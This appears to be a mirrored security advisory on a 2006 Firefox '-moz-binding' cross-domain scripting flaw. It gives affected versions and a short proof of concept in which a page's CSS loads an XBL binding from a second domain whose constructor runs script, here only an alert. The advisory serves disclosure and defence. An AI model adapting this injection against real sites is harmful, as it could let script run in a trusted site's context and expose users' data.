Mozilla Firefox XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability
TITLE: Mozilla Firefox XBL -MOZ-BINDING Property Cross-Domain Scripting Vulnerability
CLASS: Origin Validation Error
CVE:
REMOTE: Yes
LOCAL: No
PUBLISHED: Jan 30 2006 12:00AM
UPDATE: Feb 07 2006 08:54PM
CREDIT: Reported by Chris Thomas (CTho) <cst@andrew.cmu.edu>.
VULNERABLE:
Mozilla Firefox 1.5 beta 2NOT VULNERABLE:
Mozilla Firefox 1.5 beta 1
Mozilla Firefox 1.5
Mozilla Firefox 1.0.7
Mozilla Firefox 1.0.6
Mozilla Firefox 1.0.5
Mozilla Firefox 1.0.5
Mozilla Firefox 1.0.4
Mozilla Firefox 1.0.3
Mozilla Firefox 1.0.2
Mozilla Firefox 1.0.1
Mozilla Firefox 1.0
Vai alla pagina originale su Security Focus
Discussion
Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain.
The issue affects the '-moz-binding' property.
This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information.
Exploit
The following proof of concept examples are available:
http://domain1/path/to/page.html :
<html>
<head>
<style>
body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
</style>
</head>
<body>
</body>
</html>
http://domain2/path/to/xbl.xml :
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xss">
<implementation>
<constructor>
alert("XBL XSS");
</constructor>
</implementation>
</binding>
</bindings>
https://bugzilla.mozilla.org/attachment.cgi?id=209241
Solution
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com
References
References: